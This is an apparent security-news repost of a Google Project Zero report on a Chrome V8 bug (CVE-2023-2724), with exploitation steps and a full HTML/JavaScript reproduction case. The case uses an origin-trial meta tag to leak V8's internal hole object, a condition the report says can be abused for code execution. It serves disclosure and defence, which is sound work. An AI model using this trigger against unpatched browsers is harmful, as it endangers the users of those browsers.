Security
Headlines
HeadlinesLatestCVEs

Headline

Chrome Internal JavaScript Object Access Via Origin Trials

Chrome suffers from an internal javascript object access vulnerability. suffers from a code execution vulnerability.

Packet Storm
#vulnerability#ios#google#js#java#chrome

Chrome: Internal JavaScript object access via Origin Trials

VULNERABILITY DETAILS

  1. JSObject::DefineAccessor doesn’t ensure that the receiver object is in a valid state before creating an accessor property. This allows callers to extend non-extensible objects and reconfigure non-configurable properties.
  2. The function is reachable from IDLMemberInstaller::InstallAttributes:
IDLMemberInstaller::InstallAttributes ->  
InstallAttribute ->  
Object::SetAccessorProperty ->  
JSObject::DefineAccessor  
  1. When an origin trial is activated through a meta tag, InstallAttributes might be called on a JS object that has already been modified by the user code.
  2. Some origin trials install attributes directly on the global object.

To exploit the issue:

  1. Add a non-configurable property to the global object.
  2. Compile a JS function that accesses the property. The compilation dependency in [1] will be skipped.
  3. Enable an origin trial that redefines the property as configurable.
  4. Delete the property.

After that, the compiled function will reference an invalid property cell and leak the internal hole object. This is a known vulnerable condition that can be abused to execute arbitrary code.

[1] https://source.chromium.org/chromium/chromium/src/+/refs/heads/main:v8/src/compiler/js-native-context-specialization.cc;drc=837cc12de25a288edf3ac222f7265c9936e69552;l=1164

VERSION
Google Chrome 112.0.5615.49 (Official Build) (arm64)
Chromium 114.0.5713.0 (Developer Build) (64-bit)

REPRODUCTION CASE

<body>  
<script>  
var container = [{}];  
function trigger() { container[0] = documentPictureInPicture; }

Reflect.defineProperty(  
    globalThis,  
    'documentPictureInPicture',  
    { configurable: false, writable: true, value: {} });  
documentPictureInPicture = {}; // Now `documentPictureInPicture` is a non-configurable mutable slot.  
for (let i = 0; i < 50000; i++) trigger();

// The \"Document Picture-in-Picture\" origin trial force-sets the `documentPictureInPicture` property  
// on the global object.  
meta = document.createElement('meta');  
meta.httpEquiv = 'Origin-Trial';  
meta.content =  
    'AstD02iOsmKKlxPbuURr1i4CKzX6AhBpjqxCMNIinwFqsdNThmojsMI8B7m8GGlR/DNu9i6t4eqEfHvhuvSxHgQAAABe' +  
    'eyJvcmlnaW4iOiJodHRwOi8vbG9jYWxob3N0OjgwMDAiLCJmZWF0dXJlIjoiRG9jdW1lbnRQaWN0dXJlSW5QaWN0dXJl' +  
    'QVBJIiwiZXhwaXJ5IjoxNjk0MTMxMTk5fQ==';  
document.head.appendChild(meta);

delete documentPictureInPicture;  
trigger();  
container[0].prop; // Trying to access a property of the hole object should cause to a crash.  
</script>  
</body>  

CREDIT INFORMATION
Sergei Glazunov of Google Project Zero

This bug is subject to a 90-day disclosure deadline. If a fix for this issue is made available to users before the end of the 90-day deadline, this bug report will become public 30 days after the fix was made available. Otherwise, this bug report will become public at the deadline. The scheduled deadline is 2023-07-13.

Related CVE Numbers: CVE-2023-2724.

Found by: [email protected]

Related news

Gentoo Linux Security Advisory 202311-11

Gentoo Linux Security Advisory 202311-11 - Multiple vulnerabilities have been discovered in QtWebEngine, the worst of which could lead to remote code execution. Versions greater than or equal to 5.15.10_p20230623 are affected.

Gentoo Linux Security Advisory 202309-17

Gentoo Linux Security Advisory 202309-17 - Multiple vulnerabilities have been found in Chromium and its derivatives, the worst of which could result in remote code execution. Versions greater than or equal to 113.0.5672.126 are affected.

Debian Security Advisory 5404-1

Debian Linux Security Advisory 5404-1 - Multiple security issues were discovered in Chromium, which could result in the execution of arbitrary code, denial of service or information disclosure.

CVE-2023-2724

Type confusion in V8 in Google Chrome prior to 113.0.5672.126 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High)

Packet Storm: Latest News

Acronis Cyber Protect/Backup Remote Code Execution